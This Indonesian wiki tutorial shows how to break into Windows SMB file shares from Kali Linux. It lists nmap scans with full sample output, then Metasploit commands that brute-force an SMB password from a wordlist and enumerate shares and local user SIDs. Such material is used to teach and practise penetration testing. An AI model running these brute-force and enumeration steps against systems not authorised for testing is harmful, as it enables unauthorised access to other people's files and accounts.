Kali Linux: Membobol File Sharing Password di Windows 7

From OnnoWiki
Jump to navigation Jump to search

Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Scan Jaringan

Contoh

nmap -sS  -A -O  192.168.0.7
nmap -sS  -A -O  192.168.0.0/24
nmap -sS  -A -O  192.168.0.7,90


Contoh hasil

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB
Nmap scan report for 192.168.0.7
Host is up (0.0027s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
| ssh-hostkey: 
|_  1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA)
80/tcp    open  http        lighttpd 1.4.31
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    lighttpd 1.4.31
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP
| Not valid before: 2007-06-13T05:47:53 
|_Not valid after:  2027-06-08T05:47:53
|_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
873/tcp   open  rsync       (protocol version 30)
8873/tcp  open  ssl/rsync   (protocol version 30)
9001/tcp  open  http        libwww-perl-daemon httpd 1.36
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Squeezebox Server
9050/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1)
9090/tcp  open  http        uTorrent WebUI
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title (text/html).
22939/tcp open  ssl/unknown
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE
OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T
OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B
OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W
OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%
OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=
OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 

Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows 

Host script results:
|_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3-31a.osstech)
|   Computer name: TS-WVHL54C
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: TS-WVHL54C
|_  System time: 2016-02-11T06:18:51+07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol 

TRACEROUTE
HOP RTT     ADDRESS
1   2.71 ms 192.168.0.7 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds

Hack Password

Menggunakan cara bruteforce untuk hack password. Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.


msfconsole thankyou
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.0.7
set SMBUser onno
set PASS_FILE  ‘/home/sathish/password’
set THREADS 10
run


Menggunakan modul smb_enumshares, kita bisa melakukan enumerasi setiap share SMB yang tersedia pada sistem remote.


use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.31.2
set SMBUser onno
set SMBPass s3cr3t
set THREADS 10
run

Modul smb_lookupsid, akan brute-force proses pencarian SID pada sejumlah target untuk menentukan pengguna lokal yang ada dalam sistem.


use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.31.2
set SMBPass bhuvi
set SMBUser sathish
run

Referensi